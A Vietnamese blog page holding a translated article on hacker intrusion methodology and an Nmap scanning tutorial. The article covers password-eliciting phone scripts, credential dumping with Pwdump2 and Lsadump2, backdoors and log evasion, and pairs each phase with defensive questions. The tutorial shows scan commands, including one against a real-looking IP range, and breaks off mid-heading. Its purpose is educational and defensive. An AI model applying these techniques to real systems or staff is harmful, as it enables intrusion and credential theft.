Bài này sẽ trình bày cách hacker thưc hiên các công việc trong qúa trình xâm nhập các hệ thống , các mạng máy tính và làm hư hỏng các phần mềm ứng dụng;Với việc hiểu biết hơn về các phưong pháp thâm nhập của hacker , bạn có thể đánh bại họ ở trong cuộc chơi của chính họ.
Kẻ tấn công trước hết xác định các loại tên miền mà hắn thích khai thác. Sau đó hắn thực hiện một phép phân tích dấu chân của đối tượng để lấy thêm càng nhiều thông tin càng tốt thông qua các tài nguyên chia sẻ trên mạng có sẵn. Việc phân tích dấu chân sẽ cho hacker biết rằng quy mô của đối tượng ở mức độ nào, tồn tại bao nhiêu lối thâm nhập tiềm năng và những cơ chế bảo mật nào, có thể cản trở cuộc tấn công. Trong suốt quá trình phân tích hacker cố gắng khám phá tất cả các thông tin hứa hẹn liên quan mà chúng có thể hữu ích cho cuộc tấn công .Những thông tin đó bao gồm:
• Tên công ty
• Tên miền
• Các chi nhánh của Công ty (công ty con)
• Giao thức mạng Internet
• Số điện thoại
Các hacker để ý đặc biệt đến các lối thâm nhập tiềm năng mà chúng đựoc dùng để né tránh “cửa trước”( cửa chính ). Ví dụ như thay vì hì hục vượt qua firewall của một công ty mẹ thì kẻ tấn công lại khởi đầu tấn công vào 1 công ty thành viên (fụ thuộc công ty mẹ ) và sau đó cố gắng vượt qua hàng rào an ninh yếu kém ở công ty nhỏ hơn này ,vốn cung cấp 1 quyền truy cập không nghiêm ngặt ,để rồi có thể thâm nhập vào đối tượng lớn hơn(công ty mẹ).
Các chương trình quét cổng cũng được dùng để xác định xem host nào đang hoạt động ở trên Internet, các cổng TCP và UDP trên từng host đang ở trạng thái chờ mở(listening), và hệ điều hành nào cài trên mỗi host.
Các chương trình dò đường kết nối được sử dụng để giúp hacker xác định xem mối liên hệ của từng host này với các host khác và để xác định xem các cơ cấu bảo mật tiềm năng hiện diện giữa mục tiêu tấn công và người tấn công(hacker).
Sau khi đã quét cổng và dò đường kết nối xong rồi, các hacker tạo một bản đồ mạng miêu tả những hiểu biết của họ về dấu vết nhận diện trên Internet của đối tượng. Bản đồ này sau đó được dùng cho giai đoạn thứ hai của cuộc tấn công: Liệt kê các thông tin.
Đồ nghề thường dùng
.Nslookup là tiện ích dùng lệnh có sẵn ở trong Windows NT 4.0, Windows 2k, và Windows XP, có thể dùng để truy vấn hệ thống tên miền DNS và các vùng thay đổi.
Tracert là tiện ích dùng lệnh sử dụng cho các hacker tạo ra bản đồ mạng về sự hiện diện của đối tượng trong mạng.
SamSpade Giao diện của trang Web SamSpade.org cho phép thực hiện tra cứu Whois, tìm sự chuyển dịch hệ thống tên miền DNS, và dò tìm đường kết nối .
Nmap Chương trình quét các cổng dùng hê Unix.
ScanLine Chương trình quét các cổng chuẩn dùng hệ Windows NT.
Những điều để cân nhắc
Hãy xem việc sử dụng chính những phương pháp mà các hacker dùng để xét đoán một chương trình ứng dụng mà họ đang cố gắng đột nhập vào. Các câu hỏi mà bạn sẽ tự hỏi mình về các c/t ứng dụng do bạn thiết kế , bao gồm :
• Dấu vết hiện diện của các ứng dụng của bạn trong hệ điều hành là gì?
• Loại mã tưong quan nào mà c/t ứng dụng của bạn đã dựa vào? Nếu ứng dụng tương quan bị hack thì liệu điều đó có giúp cho các kẻ tấn công hack đựoc vào trong c/t ứng dụng của bạn không?
• Những thông tin nào mà c/t ứng dụng hay hệ thống sẽ thể hiện cho người sử dụng chưa được cấp quyền truy nhập lưu ý ??
• Cổng chờ mở (listening )nào mà phần mềm của bạn kich mở trong hệ thống? Liệu các gói tin định dạng xấu hay các cuộc tấn công gây ngâp lụt (flood attack) có làm
dừng các dịch vụ, chiếm hết dung lượng bộ nhớ , hay làm giảm thiểu chu kỳ hoạt động của CPU hay không ??
• Có các tường lửa hay cơ cấu ngăn chặn kích hoạt ứng dụng , dùng để ngăn chặn các người dùng không đựoc ủy quyền có thể xâm nhập vào h/t thông qua cửa chính hay không ??
Liệt kê thông tin
.Sau khi các hacker đã thực hiện phân tích “dấu chân “và tạo ra một bản đồ gần giồng với kiến thức của họ về mạng của đối tượng, họ thu thập càng nhiều dữ liệu càng tốt về từ hệ thống của đối tượng.
Web, FTP, và mail server version . Các hacker sẽ cố gắng xác định phiên bản nào của Web server, FTP server, hay mail server đang chạy bằng cách kết nối tới cổng TCP và UDP đang chờ mở và gửi dữ liệu ngẫu nhiên tới từng cổng hay server một. Có rất nhiều service trong server nói trên trả lời những dữ liệu ngẫu nhiên thăm dò này , bằng một banner data , cho phép xác định c/t ứng dụng đang chạy và các thông tin tin cậy về phiên bản . Các hacker sẽ dùng các cơ sở dữ liệu về các lỗ hổng bảo mật như của Securityfocus để kiểm tra chéo các thông tin này nhằm tìm ra những lỗi có thể khai thác được.
Những thông tin nhạy cảm. Nếu các hacker giao tiếp với những cổng nào đó ở trên host( ví dụ như cổng TCP 139 hay 445), họ sẽ nặc danh liệt kê các thông tin nhậy cảm từ hệ thống bao gồm:
• Tên người sử dụng (user name).
• Lân cuối cùng đăng nhập vao hệ thống
• Ngày thay đổi password
• Nhóm thành viên
Các hacker có thể sử dụng các thông tin có được từ truy vấn nói trên để thưc hiên 1 cuộc tấn công ” ép dò mật khẩu ” (brute force ) nhằm đoạt quyền truy cập hệ thống như một người sử dụng đưọc ủy quyền. Ví dụ, hacker sẽ liệt kê các thành viên ở trong nhóm quản trị cục bộ, tìm kiếm các tên người sử dụng như các TEST hay BACKUP có thể dễ dàng đoán được mật khẩu của họ.
Đồ nghề thường dùng
Netcat (đã có trong danh sách tiện ích mạng) Đây là “lưõi dao quân Thụy sĩ “của các hacker . Sử dụng nó để biết các banner , quét cổng và các công việc nữa.
Epdump/Rpcdump Các công cụ để kích hoạt từ xa các service của các c/t ứng dụng trên một server
Getmac ( nằm trong Windows NT resource kit) Lệnh của Windows NT để lấy địa chỉ MAC ở trong mạng Ethernet và tạo kênh kết nối tới một máy tính chạy Windows NT 4.0, Windows 2000, hay Windows XP.
DumpSec Chương trình kiểm tra bảo mật cho các hệ thống chạy Windows NT. Nó sẽ liệt kê các chi tiết về người sử dụng và nhóm sử dụng trong hệ thống đã chọn. Đây là công cụ liệt kê và kiểm tra mà 5 công ty kiểm toán lớn trên thế giới(PricewaterhouseCoopers, Ernst & Young, KPMG, Athur Andersen, and Deloitte & Touche) và các hacker đã lựa chọn
Các SDK . Rất nhiều bộ phát triển phần mềm(SDK) cung cấp cho các hacker các công cụ cơ bản mà họ cần để hiểu thêm về hệ thống.
Những điều để cân nhắc
• Loại thông tin nào có thể có được từ các cổng chờ mở (listening)? Mức độ cho phép cần thiết để liệt kê các thông tin này?
• Liệu có chỗ nào ghi lại xem ai đã liệt kê các thông tin này?
• Liệu có tiềm ẩn trong hệ thống khảnăng gíup cho người sử dụng không đưọc ủy quyền có thể xem các dữliệu bảo mật nhạy cảm hay các thông tin xác định cá nhân (PII) mà việc đó có thể làm tổn hại tới lợi ích cá nhân không?
• Loại banner thông tin gi mà c/t ứng ụng cung cấp cho người sử dụng? Điều đó có thể cần loại bỏ hay thay đổi bởi người quản trị hệ thống hay không?
Đoạt quyền truy cập thông qua thao tác của người sử dụng
Sau khi các hacker đã kiếm đủ các thông tin cơ bản về đối tượng của họ rồi thì họ sẽ tiếp cận để đoạt quyền truy cập tới hệ thống của đối tượng bằng cách giả dạng thành người dùng có quyền. Điều đó có nghĩa rằng họ cần một password cho một người dùng mà họ đã phát hiện ra thông qua các bước một và bước hai ở trên. Có hai cách thông thưòng nhất để có được mật khẩu: bằng cách sử dụng ” kĩ năng xã hội “(social engineering )hay bằng tấn công ” ép dò mât khẩu “(brute force )
Điều ngạc nhiên là một nhân viên tin cậy (của Công ty ) sẽ làm gíup (những việc cần thiết ) cho một ai đó nghe có vẻ như là có quyền thế lắm. Một vài hacker sẽ lấy thông tin mà họ cần ,từ việc đãng kí tên miền hoặc từ trang web của công ty và trực tiếp liên lạc với 1 nhân viên công ty bằng điện thoại.
Bằng một mẹo nhỏ nào đó, họ có thể làm cho nhân viên đó để lộ ra mật khẩu của mình mà không gặp phải bất cứ nghi ngại nào Cuộc nói chuyên của họ na ná như sau:
“Đây là nhóm trợ giúp và chúng tôi đang gỡ rối các khu vực trong các mạng khác nhau. Tôi đang kiểm tra ở trong khu vực mạng của bạn, và chúng tôi muốn theo dõi mạng mà bạn đánh mật khẩu của mình.Xin bạn nói rõ từngký tự của mật khẩu để chúng tôi theo rõi và chắc chắn rằng sẽ thấy chúng trên mạng.”
hoặc là có thể như sau:
“Chúng tôi đã hoàn tất công việc kiểm tra mật khẩu của bạn và thấy rằng nó không an toàn. Vui lòng thay đổi mật khẩu của bạn thành“xYzA1G24#… để nó sẽ ít bị bể khoá trong tương lại.”
Tấn công bằng cách “ép dò mật khẩu’
Nếu như kỹ năng xã hội không được hoặc không phải là sự lựa chọn thì sẽ có cách tiếp cận thứ hai đó là “ép dòmật khẩu . Các kiểu tấn công này có thể được tiến hành để chống lại các c/t ứng dụng hay dịch vụ chỉ chấp nhận người sử dụng được ủy quyền . Chúng( cáccuộc tấn công ép do mật khẩu )bao gồm các loại sau: (nhưng tất cả không chỉ có những loại này ):
• Hệ thống vào/ra cơ sở mạng (NetBIOS: Network basic input/output) qua giao thức TCP(TCP 139)
• Direct Host(TCP 445)
• Lightweight Directory Access Protocol (LDAP), (TCP 389).
• FTP(TCP 21)
• Telnet(TCP 23)
• Simple Network Management Protocol(SNMP), (UDP 161)
• Point-to-Point Tunneling Protocol (PPTP),(TCP 1723)
• Terminal Service(TCP 3389)
Nếu như hacker có thể liên lạc với các dịch vụ nói trên thì hắn sẽ dùng các tên của người sử dụng(user name) lấy đưọc ở các bước trước đem ra để thử tấn công “ép dò mật khẩu “. Tiện ích ” ép dò mật khẩu ” chứa các bản tin “Tự điển mật khẩu” trong đó có thể có mật khẩu của người sử dụng . Mỗi một từ trong từ điển(hay của các phiên bản khác ) được coi là một mật khẩu tiềm năng và được thử từng cặp với tên người sử dụng cho tới khi thâm nhập đưọc vào mục tiêu
Các cài đạt tiêu biểu của Windows NT 4.0, Windows 2000, và Windows XP sẽ cản trở kiểu tấn công này do ở trưòng hợp mặc định việc kiểm tra đăng nhập đưọc hay không thực hiện đưọc .Trừ phi các mật khẩu phức hợp được sử dụng cho mỗi user account, một cuộc tấn công dùng mật khẩu kiểu từ điển có thể hoàn toàn thành công với các host đang giám sát.
Để che đậy danh tính của mình, các hacker sẽ cố gắng tránh sự phát hiện ,thậm chí ngay cả khi việc đăng nhập logon thành công.. Với cách đặt tên máy tính bằng cách dùng các kí tự ASCII – là loại không thể in được ; tên máy tính của họ sẽ không hiên lên trong bảng theo dõi qúa trình đăng nhập
Công cụ phổ biến
.Công cụ ( tiện ích )kiểm tra NetBIOS . Công cụ “ép dò mật khẩu “ ( Brute Force )
Những điều cân nhắc
• Liệu việc kiểm tra đăng nhập vào hệ thống ở chế độ mặc định có thành công được không?
• Liệu có các cơ cấu bên cạnh ( hỗ trợ ) server mà bạn có thể sử dụng để làm chậm lại hay vô hiệu hoá tấn công “ ép dò mật khẩu “ được không?
• Liệu bạn có thể dò đưọc dấu vết nguồn gốc khởi phát các cuộc tấn công “ép kiểm mật khẩu “không? Loại thông tin liên quan đến vi trí (đia lý ) nào bạn có thể có được?
.Tên DNS hay địa chỉ IP?Tên máy tính? Địa chỉ của gateway hay địa chỉ của host cụ thể nào đó?
• Liệu các ngưòi có tài khoản ở mức người sử dụng có thể chỉnh sửa trạng thái bảo mật áp dụng cho các dịch vụ để họ có thể đưa vào hệ thống các trojan như là họ đang có 1 đăc quyền làm như vậy trong hệ thống hay không ?
• Liệu có môt file nào đó mà ngưòi sử dụng có thể ghi đè lên , như là họ đang chạy các dịch vụ vớí môt đặc quyền cao hơn hay không ?
Thu thập thêm các mật khẩu và bí mật khác
Điều đầu tiên mà các hacker làm sau khi đã đột nhập vào hệ thống bằng với tư cách như là của người quản trị là lấy các file chưa mật khẩu. Các hacker có thể sử dụng
các công cụ như Pwdump2 để lấy các mật khẩu băm từ cơ sở dữ liệu quản lí bảo mật các tài khoản(SAM) cục bộ hay các Active Directory ở chưong trình kiểm soát tên miền. Các mật khẩu băm có thể được đưa vào các chưong trình như John the Ripper hay LC3 và bị bẻ khóa .
Như một người quản trị, các hacker có thể lấy các mật khẩu bằng văn bản từ nơi đảm bảo quyền truy cập cục bộ(LSA). Đăc biệt là, các mật khẩu dùng để khởI đông các dịch vụ đã được lưu trữ (các mật khẩu này đã đưoc ngụy trang và mã hoá) ở trong LSA. Sử dụng các công cụ như Lsadump2, mọi mật khẩu dạng văn bản của các tài khoản dụng để khởI động các dịch vụ tương ứng có thể được liệt kê.hết ra .
Dù cho điều nói trên có thể chưa đưọc coi là một sự nguy hiểm nếu như các tài khoản dùng để khởI động các dịch vụ chỉ thuộc về các thành viên ban quản trị của hệ thống cục bộ nà y (hay tài khoản ấy có quyền truy cập thấp hơn), nhưng một sự đe doạ lớn hơn có thể xuât hiện nếu như tài khoản được dùng để khỏI động các ứng dụng lạị thuộc về một thành viên quản trị của cả miền đó(hay miền cao cấp hơn). Ở trong tình huống xấu nhất, hacker(với tư cách là một người quản trị hệ thống cục bộ) sẽ có thể lấy được mật khẩu dạng văn bản của một tài khoản đăng nhâp vào trong môt miền ( khu vực )mà họ chưa từng hack vào .
Sau khi các mật khẩu của hệ thống cục bộ và mât khẩu đầy hứa hẹncủa một miền đã lấy được, hacker sẽ tham khảo chéo các mối kết hợp tên người sử dụng/mật khẩu mà họ đã có được với các tên người sử dụng mà họ đã liệt kê đươc từ các hệ thống khác trong giai đoạn liệt kê trên đây . Nếu như có đủ thời gian hay sự may mắn cần thiết Hacker có thể truy cập tới tất cả các máy tính ở trong mạng bằng quyền của người quản trị, trong khi khởI đầu họ chỉ thâm nhập vào đưọc mỗI môt máy tính .
Các công cụ phổ biến
Pwdump2 Công cụ để có thể có được mật khẩu băm từ cơ sở dữ liệu SAM hay Active Directory.
Lsadump2 Công cụ chuyển nội dung của LSA ra dạng văn bản.
LC3 Công cụ kiểm mật khẩu để đánh gía các mật khẩu băm của Windows NT, Windows 2000, Windows XP.
John the Ripper Công cụ bẻ mật khẩu cho nhiều hệ điều hành.
Những điều cân nhắc
• Liệu các file ghi lại qúa trình (logs) có thể được tạo ra khi các file chứa mật khẩu bị truy cập không?
• Liệu các các file ghi lại qúa trình (logs) có thể được tạo ra khi người quản trị cố gắng chèn thêm các đoạn mã đôc vào các qúa trì nh của hê thông nhằm cố gắng truy cập tới các dữ liệu mật khẩu hay không ?
• Liệu các mật khẩu được lưu trữ ở trong hệ thống có cái nào dùng cho 1 tài khoản nào đó có mức quyền truy cập cao hơn sovới các tài khoản của người quản trị cục bộ hay không?
• Liệu có các mật khẩu của các tài khoản cho mức quản trị viên ( hoặc tương đương ) ở hệ thống này( hê thống đang bị thâm nhập ) có giống với mật khẩu của các tài khoản cho quản trị viên ở các hệ thống khác không?
• Liệu những người sử dụng được khuyến khích chọn các mật khẩu phức tạp không?
Tạo lập “cửa sau ” ( “Back door”)
Trong trường hợp các hacker bị phát hiện và cần phải nhanh chóng rời khỏi máy tính ngay, họ thường tạo lập một cửa sau ở trong mỗi hệ thống họ đã đột nhập. Cửa sau có thể có nhiều dạng nhưng chung nhất vẫn là một cổng chờ mở (listening) ở trong hệ thống mà nó sẽ cho phép hacker truy cập vào hệ thống từ xa(có hay không có sự uỷ nhiệm đặc biệt)
Tường lửa hoặc việc lọc trên router sẽ ngăn cản hacker truy cập qua các cổng này lần sau,tuy nhiên, các bộ lọc tuyến (router) có thể không thể ngăn cản đưọc việc thâm nhập qua các cổng TCP có số cao ( hay bất cứ cổng UDP nào) hoặc lại có thể cho phép thâm nhập qua (cửa sau )nếu dữ liệu nguồn đưọc khởi phát từ các cổng riêng biệt (của máy Hacker ), như cổng TCP 20, 53, hay 8. Nếu bộ lọc tuyến mạnh hay có tường lửa đưọc cài đặt , có thể cần một cửa sau phức hơp hơn.
Một dạng cửa sau phức hợp tham gia vào qúa trình reverse trafficking ( tạo tuyến lưu thông đảo ngưọc ). Reverse trafficking cho phép kẻ tấn công đi vòng qua các cơ cấu bảo mật. Trong khi các bộ định tuyến và tường lửa có thể ngăn cản các gói tin không mong muốn vào mạng từ phía bên ngoài, thì nó lại như có vẻ phù hợp với việc các
người sử dụng máy client ở trong tường lửa được phép từ một cổng xác định (trên máy client) mở môt kết nối tới bất cư host nào ở bên ngoài. Một con trojan thuộc loại này sẽ có thể định kì liên lạc thưòng xuyên với máy tính của hacker qua cổng 80. Máy khách(client) sẽ “đẩy” các shell điều khiển hệ thống cho hacker ,do đó mà hacker sau đó có thể chạy các mã trên máy tính đã được “bảo vệ” này.
Một ví dụ về reverse trafficking là sâu Code Red. Code Red sẽ ra lệnh cho các Web server chưa vá lỗi (qua cổng TCP 80) để kích hoạt môt liên kết theo giao thức TFTP từ server tới một host trên Internet, nơi mà sau này bị gửI đến đoạn mã phá hoại. Việc khởi tạo kết nốI tởi Web server thông qua cổng 80 là hoàn toàn hợp lê (và sẽ thậm chí vượt được qua cả tường lửa). Trong hầu hết các trường hợp ,tường lửa và bộ định tuyến sẽ cho phép Web server khởi tạo một kết nối TFTP(UDP 69) tới máy của hacker trên Internet.
Có rất ít lí do hợp lí( dù cho là có l ý do ) để làm Web server phải khởi tạo một kết nối TFTP hay SMB tới bất kỳ một host nào ở trên Internet. Tường lửa và các bộ định tuyến sẽ phải được cấu hình để ngăn chặn các gói tin không yêu cấu từ trong Web hay mail server đi ra ngoài mạng tới các máy không mấy tin cậy ở trên Internet.
Công cụ phổ biến
Netcat (đã liệt kê ở các công cụ tiện ích mạng) Đây là con dao găm của các hacker Thuỵ sỹ. Có thể dùng để chuyển các shell tới các hệ thống ở xa.
Những điều suy nghĩ
• Liệu hệ thống hay các chương trình ứng dụng (cài trong hê thông )có một cơ cấu nào để phát hiện các mã trojan có thể đang chạy trên hệ thống hay không ?
• Liệu hệ thống có thể phát hiện ra các cơ cấu hay dịch vụ mà kẻ tấn công đã tạo ra hay không ?
• Liệu có cơ sở nhận biết nào vê các cổng chờ mở , các dịch vụ và cơ cấu mà hệ thống có thể giám sát , giúp cho việc xác định nếu như một đoạn mã phá hoại đã được kích hoạt hay không?
• Liệu có các thiết bị bảo mật(tường lửa, bộ định tuyến) đả được cấu hình để ngăn chặn vi ệc chuyển các thông tin không yêu cầu ra ngoài mạng ,bắt nguồn từ mỗi host hay không?
Đánh bung hệ thống
Chuyển đổi cổng để lừa được các thiết bị bảo mật truyền thống, các hacker sẽ tạo ra sự chuyển đổi cổng ở trong host đã bị xâm nhập đầu tiên, các host này sẽ tự động chuyển tất cả các thông tin trao đổi hướng đến các host khác cùng trong mạng . Việc chuyển đổi cổng có thê giúp đưa nguồn thôngtin trao đổi đi vòng qua các bộ lọc
cổng, bộ định tuyến, tường lửa, và thậm chí có thể được mã hoá để vươt qua dãy lớp cổng bảo mật(SSL) nhằm tránh bị các thiết bị phát hiên xâm nhập.phát hiện .
Khi việc chuyển đổi cổng được áp dụng cho các gói tin lưu chuyển giữa máy của hacker và hệ thống đích, việc định danh chính xác hacker về căn bản đã bị “xoá sạch”.
Nếu như hệ thống đích có thề kiểm soát viểc logon không thành công, hay đang chạy một hệ thông thứ ba phát hiện xâm nhập , nó sẽ chỉ ghi lại đựoc địa chỉ IP hay tên máy tính cùa host đang thực hiện việc chuyển đổi cổng, chứ không phải là của máy hacker. Điều đó sẽ làm cho viêc dịnh danh hacker trở thành rất khó khăn . Bởi vì mọi kết nối thông tin đi đến hoặc đi ra từ máy mục tiêu tới máy proxy bởi hacker dưòng như là hợp lệ , do hacker đã áp dụng việc chuyển đổi cổng (port redirector).
Hack các hệ thống khác: sau khi hacker đã hoàn toàn hack xong hệ thống cục bộ, gài các cửa sau và thưc hiên việc chuyển đổi cổng, cũng như đã lấy tất cả các thông tin có thể cho mình, họ sẽ tiến hành hack các hệ thống khác trong mạng. Rất phổ biến trưòng hợp các dịch vụ phù hợp các tàì khoản của người quản trị, hay tài khoản hỗ trợ nằm ở trong mỗi hệ thống, nhờ đó mà những kẻ tấn công có thể thâm nhập vào mỗi hệ thống trong một thời gian ngắn Khi từng hệ thống mới bị hack, kẻ tấn công sẽ thi hành các bước chính như mô tả ở trên để tìm thêm các hệ thống khác và thu thập các thông tin mật khẩu..
Kẻ tấn công tiếp tục lấy các thông tin ở trong mỗi hệ thống cho tới khi hắn tìm được mật khẩu cho mỗi tài khoản của các hệ thống có giá trị hơn ( quan trọng hơn ) kể cả:
hệ thống thanh toán trên mạng , kiểm soát tên miền gốc, và các Web server. Qúa trình quét và khai thác các hệ thống theo cách này thường có thể là tự động, để các hacker có một chút thời gian nghỉ ngơi hay cho phép họ tập trung chú ý tới các khu vức khác trong công ty mục tiêu .( công ty đang thâm nhập )
Rất khó phát hiện loại hoạt động này , bởi vì kẻ tấn công thường hoạt động dưới tài khoản họp lệ của người quản trị. Trừ phi kẻ tấn công bị tóm trước khi họ đoạt được quyền truy cập hệ thống của quản trị viên , thì gần như không thể buộc họ ra khỏi mạng được.
Công cụ tiên ich (sử dụng ).
Fpipe Một chương trình chuyển đổi cổng cho các hệ điều hành Windows. Cho phép xác định cổng nguồn dung cho việc chuyển đổ kết nối .
Nhưng điều suy nghĩ
• Liệu trong hệ thống có bố trí các qúa trình giúp giám sát các qúa trình diễn biến trong hệ thống (log ) xuyên suốt qua nhiều máy tính và giúp tìm các mối tương quan trong trình tự cuộc tấn công để khuyến cáo (cho ngưòi quản lý hệ thống ) về môt cuôc thâm nhập đưoc tiến hành 1 cách tư động đang diễn ra trong hệ thống hay không ?
• Liệu danh sách các nhóm thành viên có đưọc xem xét lại thường xuyên để chắc chắn rằng một “tài khoản hacker” mới vẫn chưa được chèn thêm vào nhóm quản trị mạng hay không?
Tài liệu tham khảo
Microsoft Security Web site Public Web site with links to security bulletins and product security information.
Hacking Exposed: Network Security Secrets and Solutions, Third Edition Stuart McClure, Joel Scambray, and George Kurtz take a comprehensive look at hacker methodologies across multiple platforms and devices.
Hacking Exposed Windows 2000: Network Security Secrets and Solutions Scambray and McClure detail hacker techniques specific to Microsoft platforms
Hướng dẫn sử dụng Nmap
11 Tháng 6 2008 4 phản hồi
in Basic Hacking Thẻ:hack, hacking, nmap, telnet
Phần 1
Vai dieu nhan nhu: Huong dan mot so tuy chon quet co ban cua nmap. Tieng anh cua toi hoi kem, co the dich chu duoc sat
nghia mong cac ban thong g cam. Cac thuat ngu viet tat nhu: TCP, UDP, SYN, ACK…co le ban phai tu minh tim hieu lay tren
mang thoi. Bai dich nay chi co tinh chat hoc hoi trao doi kinh nghiem.
Nmap = Network exploration tool and security scanner (Network Mapper) Dung nhu ten goi la la mot cong cu Scan hang dau…No Scan tat ca nhung gi co the Scan duoc tren Network. Mot Scanner da chuc nang va cung da luon ca OS ma toi duoc biet.
Cau truc lenh cua Nmap
nmap [Scan Type(s)] [Options]
Duoi day la mot so Scan Type
Scan Type
-sT TCP connect Scan: Day la kieu quet don gian nhat cua qua trinh quet giao thuc TCP. Ket noi goi he thong do, he dieu hanh cu ban cung cap duoc su dung de open mot ket noi toi mot so Port tren he thong. Neu Port dang o trang thai lang nghe, thi ket noi se thanh cong, va nguoc lai ket noi se khong thanh cong. Mot loi the manh me cua ky thuat quet nay la khong can bat cu nhung dac quyen cao cap nao ca. Moi nguoi dung Unix co the tu do su dung ky thuat nay.
Ky thuat nay co the de dang phat hien duoc nhung muc tieu va cho ta biet tinh trang ket noi va thong bao nhung sai lam ve dich vu chap nhan ket noi.
-sS TCP SYN Scan: Day la ky that quet duoc gioi thieu toi nhu la ky thuat quet “half-open”. Duoc dung trong truong hop ban khong the mo mot ket noi TCP day du. Ban gui mot SYN Packet, trong khi neu ban muon mo mot ket noi thuc te va ban dang doi mot su dap lai. Mot SYH|ACK chi bao rang port dang lang nghe. Mot RST bieu thi o trang thai khong lang nghe. Neu SYN|ACK nhan duoc, mot RST duoc gui suong de xe ket noi. Bat loi trong ky thuat quet nay la ban can
phai co nhieu dac quyen de xay dung nhung SYN Packet.
-sF -sX -sN Stealth FIN, Xmas Tree, or Null scan modes: Duoc dung khi khong du dac quyen de su dung ky thuat SYN Scan. Mot vai Firewall va bo loc Packet giam sat cac SYN de han che den cac Port, va nhung chuong trinh nhu SYNlogger va Counrtey san sang phat hien ra cac hanh dong Scan cua ban. Loi the cua kieu Scan nay la co the Scan xuyen qua cac Firewall va bo loc Packet ma it bi tro ngai, ngan can. Y tuong dong cac Port va yeu cau tra loi toi Packet tham do cua ban voi mot RST, trong khi mo nhung cong phai thi phai bo qua cac goi trong cau hoi (xem RFC 793 pp 64). FIN Scan su dung cac FIN Packet nhu de tham do, trong khi Xmas tree quay tro lai Scan tren FIN, URG. Microsoft hoan toan khong ho tro cac tieu chuan kieu nay. Do do ky thuat Scan nay khong the su dung duoc tren cac he thong Window (95, 97, 98, 98Se, Me, NT, 2000). Ky thuat quet nay thuong duoc tren cac he thong cua Cisco, Unix, HP-UX, Irix…
-sP Ping scanning: Ky thuat nay duoc dung trong truong hop ban chi muon biet co bao nhieu Host hien dang Online tren mot Network nao do. Nmap co the thuc hien dieu nay bang cach send nhung goi ICMP yeu cau doi lai den cac dia chi IP tren mang. Tuy nhien cung co mot so Host co the chan lai cac ICMP Packet phan hoi. Nhu vay nmap co the send Packet TCP ack den port 80 (mac dinh, co the doi port). Neu chung ta co mot RST tro lai, dieu do co nghia la host do dang Online. Hoac mot ky thuat thu 3 keo theo viec send mot SYN Packet va doi cho nhung RST hay SYN/ACK. Duoc dung cho nhung Normal User (khong phai Root User – khong co nhung dac quyen rieng). Neu ban co quyen Root, nmap se su dung ca ICMP va ACK song song voi nhau. Ban co the thay doi tuy chon -P mo ta ve sau.
-sU UDP Scan: Ky thuat nay duoc su dung de xac dinh xem Port UDP nao dang open tren host. Nmap se send UDP Packet co dung luong 0 byte den moi Port tren muc tieu. Neu chung ta nhan duoc thong bao khong the Connect den Port ICMP, sau do Port bi dong. Truong hop khac, gia thiet rang no mo (Port). Mot vai nguoi thuong nghi rang ky thuat UDP Scan khong hieu qua. Nhung chung thuong duoc dung cho lo hong Rpcbind tren OS Solaris. Hoac mot so Backdoor nhu Back Orifice duoc Config tren Port UDP cua OS Windows.
-sA ACK Scan: Ky thuat nay duoc su dung de thu thap cac thong tin ve ho thong tu ben ngoai Firewall. Dac biet no co the xac dinh xem cac Firewall co phai la mot Firewall theo dung nghia hay chi la mot bo loc Packet SYN tu ben ngoai. Ky thuat nay co the send nhung ACK Packet den nhung Port duoc chi ro. Neu mot RST tro lai thi dieu do co nghia la cac Port d khong co chuc nang loc SYN Packet, va nguoc lai.
-sW Window scan: Ky thuat tuong tu nhu ACK Scan. Chi co dieu ban de phat hien duoc nhung Port open voi bo loc, cung nhu khong voi bo loc. Duoc chi dinh dung cho cac OS nhu: AIX, Amiga, BeOS, BSDI, Cray, Tru64 UNIX, DG/UX, OpenVMS, Digital UNIX, FreeBSD, HP-UX, OS/2, IRIX, MacOS, NetBSD, OpenBSD, OpenStep, QNX, Rhapsody, SunOS 4.X, Ultrix, VAX, and VxWorks…
-sR RPC Scan: Ky thuat nay se lam lay tat ca cac Port UDP/TCP dang Open sau do lam ngap chung voi chuong trinh Sun RPC, vo hieu hoa nhung lenh de xac dinh xem no co phai la Port RPC khong. Ban se thu thap duoc mot so thong tin ve he thong, nhu ve Firewall chang han…
——————————————————————————–
Phần 2
Nmap phan II – Ban ve cac Option va VD cu thehuc cnang cua no
Truoc het anh em can xem lai cau truc lenh cua Nmap
nmap [Scan Type(s)] [Options]
Duoi day la cac tuy chon chuc nang cua Nmap:
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p ports to scan. Example range: ’1-1024,1080,6666,31337′
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don’t ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-T General timing
policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes
resolve]
-oN/-oM Output normal/machine parsable scan logs to
-iL Get targets from file; Use ‘-’ for stdin
* -S /-e Specify source address or network
interface
Chung ta hay xem xet tung VD cu the:
1)Quet Port (Scan Port)
Muc dich: Xem Port nao dang Open, tu do chung ta co the biet duoc Target dang Run nhung Service gi. Ban co cau hinh, them bot dinh nghia cac Port o File namp-services. De thuc hien cong viec tren ban go:
nmap -sT www.target.com
Neu thich kin dao ban co the dung tuy chon Scan SYN
nmap -sS www.target.com -o info.txt
Tuy chon -o filname de luu ket qua ra mot file cho phep ta doc lai sau.
Sau khi Scan ban se thay:
Starting nmap V 2.53 by Fyodor (fyodor@dhp.com, www.insecure.com/nmap)
Interesting ports on (IP cua target.com).
Port State Protocol Service
21 open TCP FTP
23 open TCP Telnet
25 open TCP SMTP
80 open TCP HTTP
..
Chac toi khong can phai giai thich gi them nua.
2)Quet Ping:
Muc dich: Tuong tu nhu quet ICMP, muc dich cua quet Ping la se quet phan lop D cua mot he thong mang nao do tu do cho ta biet hien trong phan lop do hien dang co bao nhieu host dang Online (cung nhu dang Open mot Port nao do do ta dat). Lenh sau se Ping cac host dang Open Port 80:
nmap -sP -PT80 202.162.48.0/24
Hoac
nmap -sP -PT80 202.162.48.0-254
Ban se thay:
TCP probe ports is 80
Starting nmap V 2.53 by Fyodor (fyodor@dhp.com, www.insecure.com/nmap)
Host (202.162.48.0) appears to be up
Host (202.162.48.1) appears to be up
Host (202.162.48.2) appears to be up
…
Host (202.162.48.x) appears to be up
Nmap run completed — 256 IP addreses (x hosts up) scanned in x seconds.
3)Scan Indent
